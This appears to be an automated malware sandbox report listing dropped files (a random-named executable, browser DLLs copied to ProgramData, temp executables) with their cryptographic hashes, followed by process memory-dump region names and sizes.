88462a4e6af9bfba1104edaedc8aba5970cddb971ef47af6b0b931cd8027832b3625f9ace7876b59f3753f937d569589e20a6da92aa30821a2b49356222a8698

Download Submit
C:\Windows\SysWOW64\pqzkllxd\tayjojxl.exe
MD5
5542ac373556eea886a08106e8f90147

SHA1
c10e9d1314778cec93d70390197446eb7bf17132

SHA256
f8ff90a266abebf1da71e183b29fd809c2ecd55099b65c9154f45d93463ce686

SHA512
88462a4e6af9bfba1104edaedc8aba5970cddb971ef47af6b0b931cd8027832b3625f9ace7876b59f3753f937d569589e20a6da92aa30821a2b49356222a8698

Download Submit
\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\msvcp140.dll
MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\ProgramData\sqlite3.dll
MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
\ProgramData\vcruntime140.dll
MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
\Users\Admin\AppData\Local\Temp\2200.exe
MD5
1772f2f7dd150e0a244e335f16bd6a47

SHA1
810015c53414a98e54ccc4db5853ed97f0d0afa1

SHA256
f7e22e20cd90f57ce6025dfb5bd05d49963e1915c18abcf16af7503a7215be8b

SHA512
f9cffa36af83c2a2e4830989a51f5f69bee4889a97ccf927dbcc36e63e9200cc0c9ed9544b1011f3d41f967e5f1900e8f2a99cd15300dc47683b13ebf75475cd

Download Submit
\Users\Admin\AppData\Local\Temp\2CF9.exe
MD5
8df6ef1e48d3a33226c91bf4a93b0c8a

SHA1
e70ed102babe577b9481be056cb8cc0564bdc669

SHA256
5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

SHA512
d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

Download Submit
memory/524-94-0x000000000041C5CE-mapping.dmp

Download
memory/524-93-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/524-99-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/524-117-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/624-119-0x0000000000000000-mapping.dmp

Download
memory/624-133-0x0000000004914000-0x0000000004916000-memory.dmp

Filesize
8KB

Download
memory/624-123-0x0000000004911000-0x0000000004912000-memory.dmp

Filesize
4KB

Download
memory/624-122-0x0000000001CB0000-0x0000000001CCF000-memory.dmp

Filesize
124KB

Download
memory/624-127-0x0000000004912000-0x0000000004913000-memory.dmp

Filesize
4KB

Download
memory/624-126-0x00000000020F0000-0x000000000210E000-memory.dmp

Filesize
120KB

Download
memory/624-128-0x0000000004913000-0x0000000004914000-memory.dmp

Filesize
4KB

Download
memory/624-124-0x0000000000400000-0x00000000004BF000-memory.dmp

Filesize
764KB

Download
memory/624-121-0x00000000003C0000-0x00000000003F0000-memory.dmp

Filesize
192KB

Download
memory/768-88-0x0000000000000000-mapping.dmp

Download
memory/1072-116-0x0000000005270000-0x0000000005271000-memory.dmp

Filesize
4KB

Download
memory/1072-98-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/1072-89-0x0000000000000000-mapping.dmp

Download
memory/1104-105-0x0000000000000000-mapping.dmp

Download
memory/1208-62-0x0000000000020000-0x0000000000029000-memory.dmp

Filesize
36KB

Download
memory/1224-78-0x0000000000000000-mapping.dmp

Download
memory/1224-109-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

Filesize
4KB

Download
memory/1252-84-0x0000000004070000-0x0000000004086000-memory.dmp

Filesize
88KB

Download
memory/1252-64-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/1252-63-0x0000000002210000-0x0000000002226000-memory.dmp

Filesize
88KB

Download
memory/1308-161-0x0000000076EB0000-0x0000000076EF7000-memory.dmp

Filesize
284KB

Download
memory/1308-154-0x0000000000000000-mapping.dmp

Download
memory/1308-157-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1308-163-0x00000000007B0000-0x00000000007F1000-memory.dmp

Filesize
260KB

Download
memory/1308-158-0x00000000013A0000-0x0000000001412000-memory.dmp

Filesize
456KB

Download
memory/1356-162-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1356-148-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1356-165-0x0000000000400000-0x0000000000401000-memory.dmp

Filesize
4KB

Download
memory/1356-164-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1356-153-0x000000000041C5CA-mapping.dmp

Download
memory/1364-139-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1364-134-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1364-138-0x0000000076EB0000-0x0000000076EF7000-memory.dmp

Filesize
284KB

Download
memory/1364-131-0x0000000000B20000-0x0000000000B94000-memory.dmp

Filesize
464KB

Download
memory/1364-135-0x0000000000180000-0x00000000001C3000-memory.dmp

Filesize
268KB

Download
memory/1364-125-0x0000000000000000-mapping.dmp

Download
memory/1404-82-0x0000000000000000-mapping.dmp

Download
memory/1404-140-0x0000000000000000-mapping.dmp

Download
memory/1404-146-0x0000000000560000-0x00000000005F0000-memory.dmp

Filesize
576KB

Download
memory/1404-147-0x0000000000400000-0x00000000004EC000-memory.dmp

Filesize
944KB

Download
memory/1404-114-0x0000000000220000-0x0000000000233000-memory.dmp

Filesize
76KB

Download
memory/1404-115-0x0000000000400000-0x00000000004A9000-memory.dmp

Filesize
676KB

Download
memory/1552-91-0x0000000000000000-mapping.dmp

Download
memory/1604-103-0x0000000000000000-mapping.dmp

Download
memory/1704-143-0x0000000000000000-mapping.dmp

Download
memory/1712-70-0x0000000000402FA5-mapping.dmp

Download
memory/1760-95-0x0000000000000000-mapping.dmp

Download
memory/1784-118-0x0000000000400000-0x00000000004A9000-memory.dmp

Filesize
676KB

Download
memory/1796-76-0x0000000000B70000-0x0000000000B71000-memory.dmp

Filesize
4KB

Download
memory/1796-73-0x0000000000000000-mapping.dmp

Download
memory/1796-81-0x0000000000660000-0x0000000000661000-memory.dmp

Filesize
4KB

Download
memory/1800-59-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1800-61-0x0000000075C71000-0x0000000075C73000-memory.dmp

Filesize
8KB

Download
memory/1800-60-0x0000000000402FA5-mapping.dmp

Download
memory/1808-112-0x0000000000089A6B-mapping.dmp

Download
memory/1808-111-0x0000000000080000-0x0000000000095000-memory.dmp

Filesize
84KB

Download
memory/1824-104-0x0000000000000000-mapping.dmp

Download
memory/2040-65-0x0000000000000000-mapping.dmp

Download
memory/2044-168-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2044-173-0x000000000041C5DA-mapping.dmp

Download
memory/2044-183-0x0000000000A90000-0x0000000000A91000-memory.dmp

Filesize
4KB

Download
memory/2044-174-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2044-176-0x0000000000400000-0x0000000000401000-memory.dmp

Filesize
4KB

Download
memory/2044-175-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2160-185-0x000000000011259C-mapping.dmp

Download
memory/2160-178-0x0000000000080000-0x0000000000171000-memory.dmp

Filesize
964KB

Download
memory/2372-189-0x0000000000000000-mapping.dmp

Download
memory/2408-190-0x0000000000000000-mapping.dmp

Download